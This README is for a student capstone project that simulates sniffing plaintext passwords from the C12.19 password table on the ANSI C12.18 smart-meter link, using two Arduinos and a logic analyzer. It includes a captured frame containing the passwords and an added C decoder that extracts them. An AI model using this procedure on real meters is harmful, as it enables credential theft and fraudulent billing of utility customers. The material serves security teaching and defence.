Smart grid devices, specifically electrical meters, adhere to the Protocol Specification for Electricity Meters (PSEM), which is defined by the ANSI C12.18 standard. C12.18 negotiates the transfer of data between a client electrical meter and a server, which is what allows electric utilities to bill their customers. The standard transports its data unencrypted (in plaintext), so it is vulnerable to interception. C12.18 also relies on a second standard, ANSI C12.19, which defines how a meter's data is stored in tables.
C12.19 defines many tables for the operation of a meter, several of which may be exploitable, but one stands out because it holds user information: the password table, which contains user ID numbers, access levels, and, most importantly, passwords. Later revisions of C12.19 offer an option for basic encryption of these passwords, but earlier implementations store them in plaintext. Even where encryption is used, brute-force password cracking may still prove useful.
This is the vulnerability. Given access to the hardware, a bad actor can wait for a PSEM read request to be sent for the password table; the plaintext passwords, together with their user ID numbers, can then be intercepted. Once a password has been captured, the attacker can send write requests to the server, for instance to cause the customer to be billed unfairly. This project simulates that attack.
- 2x - Arduino Mega 2560 microcontroller boards
- 1x - Logic Analyzer with support for reading UART lines
- 6x - Dupont breadboard jumper wires (connections depend on logic analyzer inputs)
- 1x - Computer to monitor serial data from Arduinos and output of logic analyzer
- Arduino IDE
- Logic Analyzer monitoring program (typically bundled with the logic analyzer)
- Plug both Arduino boards into a USB port for power and data transfer.
- Plug the logic analyzer into a USB port for power and data transfer.
- Connect the TX line of each Arduino to the RX line of the other (do this for both boards, so the link is cross-wired).
- Connect an alligator clip to the bottom of the wire connected to the RX line of the server.
- Connect an alligator clip to the bottom of the wire connected to the RX line of the client.
- Connect a wire to each alligator clip on one end, and to a channel of the logic analyzer on the other end (repeat for both boards).
- Clone this repository into its own directory
- Open two instances of the PSEM_Simulator Arduino sketch in two different Arduino IDE windows
- Connect both Arduino boards to the host computer
- Ensure both instances of the Arduino IDE have a different board (COM port) selected
- Designate one board as the client, and the other as the server
- In the Arduino IDE instance for the client board, ensure the PSEM_MODE macro in PSEM_Simulator.ino is set to CLIENT
- Verify and upload the program to the client board
- In the Arduino IDE instance for the server board, ensure the PSEM_MODE macro in PSEM_Simulator.ino is set to SERVER
- Verify and upload the program to the server board
- In both instances, start the Serial Monitor with the 9600 baud rate option
- The client instance should write "Starting in Client Mode" to its own serial output
- The server instance should write "Starting in Server Mode" to its own serial output
- Both the client and server should be ready and running at this time
- Connect the logic analyzer to the host computer
- Open the logic analyzer software
- Note: This is dependent on the logic analyzer chosen, and may vary between users
- Confirm that the logic analyzer is properly connected between the two boards and intercepting signals
- Note: This can be done by sending a PSEM ident request between the boards (see "Performing the Attack" for more details)
- Setup is complete
- In the client instance's serial monitor input, type an upper case "I" and press the "Enter" key
  - This command sends a PSEM ident request from the client to the server
- Ensure the packet was transmitted correctly by observing both the client and server serial monitor outputs
  - The client should display a message stating, "Successfully sent PSEM ident request."
  - The client should additionally display the bytes of the raw, transmitted PSEM packet in hex, preceded by "TX:" and enclosed between dashed lines
  - An example of the client's perspective can be seen below:

    ```
    ---------------------------------------------------
    TX: EE 00 00 00 00 01 20 3D 38
    ---------------------------------------------------
    Successfully sent PSEM ident request.
    ```

  - The server should display a message stating, "Successfully received PSEM ident request."
  - The server should additionally display the bytes of the raw, received PSEM packet in hex, preceded by "RX:" and enclosed between dashed lines
  - An example of the server's perspective can be seen below:

    ```
    ---------------------------------------------------
    RX: EE 00 00 00 00 01 20 3D 38
    ---------------------------------------------------
    Successfully received PSEM ident request.
    ```

- Observe the logic analyzer output
  - The raw UART packet containing the ident request should be visible in the output of the logic analyzer software
  - Note One: The data in the raw UART packet will differ from the raw PSEM packet, because UART adds its own framing overhead around the data
  - Note Two: The logic analyzer output will differ from user to user depending on which device is being used
- Assuming proper setup, the outputs of these three components should match, or closely resemble, the outputs described above, and the attack may continue
- In the client instance's serial monitor input, type an upper case "O" and press the "Enter" key
  - Note One: "O" stands for "offset read", a read request that asks for data from a specific table
  - Note Two: For the sake of this simulation, the offset read request is hard-coded to return only the password table
  - Note Three: In practice this offset read request would be initiated by the electrical company, not the bad actor
    - The bad actor would have to collect all incoming and outgoing data over a long period of time in the hope of catching this packet
    - The bad actor would only have access to a transmission medium (wire, optical connection, wireless transmission, etc.)
    - For the sake of this demonstration, the offset read request is isolated and initiated by the user performing the simulation
  - Note Four: The packet's transmission should be confirmed in the same way as for the PSEM ident request described in Part 1 of this section
- An example of the offset read packet captured by the logic analyzer can be seen below:

```
EE 00 00 00 00 63 00 60 01 74 77 65 6E 74 79 6F 6E 65 63 68 61 72 61 63 74 65 72 70 77 64 01 03 00 E9 07 02 14 05 1E 00 02 74 77 65 6E 74 79 6F 6E 65 63 68 61 72 61 63 74 65 72 70 77 64 02 03 00 E9 07 02 14 05 1E 00 03 74 77 65 6E 74 79 6F 6E 65 63 68 61 72 61 63 74 65 72 70 77 64 03 03 00 E9 07 02 14 05 1E 00 C1 14 AA
```
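The two captures above, decoded in code. This is an added example, not code from the PSEM_Simulator sketch or its author: a small C program that parses the Part 1 ident request and the Part 2 capture (which carries the table contents back, so it is the reply to the offset read) using the frame layout visible in the bytes: STP 0xEE, identity, control, sequence number, a two-byte length, the data, and a two-byte CRC. It recomputes the CRC trailer, checks the one-byte data checksum at the end of the table payload, and splits the table into user ID and password records, flagging each password that is entirely printable ASCII, which is exactly the signal a monitor on the meter link would alert on. Two things are assumptions rather than facts taken from the page: the CRC variant is CRC-16/XMODEM (polynomial 0x1021, initial value 0, high byte first), chosen because it is the variant that reproduces the 3D 38 shown in Part 1, and the 32-byte record layout (1-byte user ID, 21-byte password, 10 attribute bytes) is inferred from the capture rather than from the C12.19 table definition. All function and constant names are the example's own.

```c
/* Added example (not the PSEM_Simulator project's code): a decoder for the two
 * C12.18 frames shown in this README. Assumed rather than taken from the page:
 * the CRC variant (CRC-16/XMODEM, the one that reproduces "3D 38") and the
 * 32-byte record layout (1-byte user ID, 21-byte password, 10 attribute bytes). */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PSEM_STP   0xEE                   /* start-of-packet byte */
#define REC_PW_LEN 21
#define REC_LEN    (1 + REC_PW_LEN + 10)

/* Part 1: the ident request printed on the client's TX line. */
static const uint8_t IDENT_REQ[] = {0xEE,0x00,0x00,0x00,0x00,0x01,0x20,0x3D,0x38};

/* Part 2: the offset-read reply as seen on the logic analyzer. */
static const uint8_t OFFSET_READ_RESP[] = {
  0xEE,0x00,0x00,0x00,0x00,0x63,0x00,0x60,
  0x01,0x74,0x77,0x65,0x6E,0x74,0x79,0x6F,0x6E,0x65,0x63,0x68,0x61,0x72,0x61,0x63,
  0x74,0x65,0x72,0x70,0x77,0x64,0x01,0x03,0x00,0xE9,0x07,0x02,0x14,0x05,0x1E,0x00,
  0x02,0x74,0x77,0x65,0x6E,0x74,0x79,0x6F,0x6E,0x65,0x63,0x68,0x61,0x72,0x61,0x63,
  0x74,0x65,0x72,0x70,0x77,0x64,0x02,0x03,0x00,0xE9,0x07,0x02,0x14,0x05,0x1E,0x00,
  0x03,0x74,0x77,0x65,0x6E,0x74,0x79,0x6F,0x6E,0x65,0x63,0x68,0x61,0x72,0x61,0x63,
  0x74,0x65,0x72,0x70,0x77,0x64,0x03,0x03,0x00,0xE9,0x07,0x02,0x14,0x05,0x1E,0x00,
  0xC1,0x14,0xAA};

/* CRC-16/XMODEM: poly 0x1021, init 0, no final XOR, high byte sent first.
 * The published C12.18 standard instead specifies an HDLC-style CRC
 * (init 0xFFFF, result inverted), which would give a different trailer. */
uint16_t psem_crc16(const uint8_t *buf, size_t len) {
  uint16_t crc = 0;
  for (size_t i = 0; i < len; i++) {
    crc ^= (uint16_t)(buf[i] << 8);
    for (int b = 0; b < 8; b++)
      crc = (crc & 0x8000) ? (uint16_t)((crc << 1) ^ 0x1021) : (uint16_t)(crc << 1);
  }
  return crc;
}

typedef struct { int ok, crc_ok; uint16_t length; const uint8_t *data; } psem_frame_t;

/* Frame layout: STP, identity, ctrl, seq, 2-byte length, data, 2-byte CRC.
 * The frame is still returned on a CRC mismatch so the mismatch can be reported. */
psem_frame_t psem_parse(const uint8_t *buf, size_t len) {
  psem_frame_t f = {0, 0, 0, NULL};
  if (len < 8 || buf[0] != PSEM_STP) return f;
  f.length = (uint16_t)((buf[4] << 8) | buf[5]);
  if (6 + (size_t)f.length + 2 > len) return f;
  f.ok = 1; f.data = buf + 6;
  uint16_t want = (uint16_t)((buf[6 + f.length] << 8) | buf[7 + f.length]);
  f.crc_ok = psem_crc16(buf, 6 + f.length) == want;
  return f;
}

typedef struct { uint8_t user_id; char password[REC_PW_LEN + 1]; int plaintext; } pw_record_t;

/* Read-reply payload: 2-byte count, <count> table bytes, 1-byte checksum
 * (table bytes plus checksum sum to 0 mod 256). Returns the record count, or
 * -1 if the payload is inconsistent. plaintext=1 marks a password made entirely
 * of printable ASCII, i.e. a credential readable by anyone tapping the line. */
int psem_decode_password_table(const uint8_t *data, uint16_t dlen,
                               pw_record_t *out, int max_out, int *checksum_ok) {
  if (dlen < 3) return -1;
  uint16_t count = (uint16_t)((data[0] << 8) | data[1]);
  if (2 + (size_t)count + 1 != dlen) return -1;
  const uint8_t *table = data + 2;
  uint8_t sum = 0;
  for (uint16_t i = 0; i <= count; i++) sum = (uint8_t)(sum + table[i]);
  *checksum_ok = (sum == 0);
  int n = 0;
  for (uint16_t off = 0; off + REC_LEN <= count && n < max_out; off += REC_LEN, n++) {
    out[n].user_id = table[off];
    memcpy(out[n].password, table + off + 1, REC_PW_LEN);
    out[n].password[REC_PW_LEN] = '\0';
    out[n].plaintext = 1;
    for (int i = 0; i < REC_PW_LEN; i++)
      if (out[n].password[i] < 0x20 || out[n].password[i] > 0x7E) out[n].plaintext = 0;
  }
  return n;
}

/* Decode the Part 2 capture into a static table; returns the record count. */
static pw_record_t g_recs[4];
static int g_checksum_ok;
int response_decode(void) {
  psem_frame_t f = psem_parse(OFFSET_READ_RESP, sizeof OFFSET_READ_RESP);
  return f.ok ? psem_decode_password_table(f.data, f.length, g_recs, 4, &g_checksum_ok) : -1;
}
int response_checksum_ok(void) { return g_checksum_ok; }
const pw_record_t *response_record(int i) { return &g_recs[i]; }

int main(void) {
  psem_frame_t id = psem_parse(IDENT_REQ, sizeof IDENT_REQ);
  printf("ident request: length %u, CRC %04X (%s)\n", id.length,
         psem_crc16(IDENT_REQ, 7), id.crc_ok ? "matches trailer" : "mismatch");
  int n = response_decode();
  printf("offset-read reply: %d records, data checksum %s\n", n, g_checksum_ok ? "ok" : "bad");
  for (int i = 0; i < n; i++)
    printf("  user %d: %s%s\n", g_recs[i].user_id, g_recs[i].password,
           g_recs[i].plaintext ? "   <- password readable on the wire" : "");
  return 0;
}
```

Compile with any C99 compiler and run it: it prints the ident request's CRC, the record count and checksum verdict for the captured table, and one line per record. The parser reports a CRC mismatch instead of dropping the frame, which matters in practice because the CRC the published C12.18 standard specifies is the HDLC-style one (initialized to 0xFFFF and inverted), so frames from a standards-conforming meter would still parse here but show a mismatch against the sketch's variant. A line monitor therefore has to be told which CRC the device it watches uses before its verdicts mean anything.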
This project was developed as a capstone submission for CS 4404, Tools and Techniques in Computer Network Security, at Worcester Polytechnic Institute.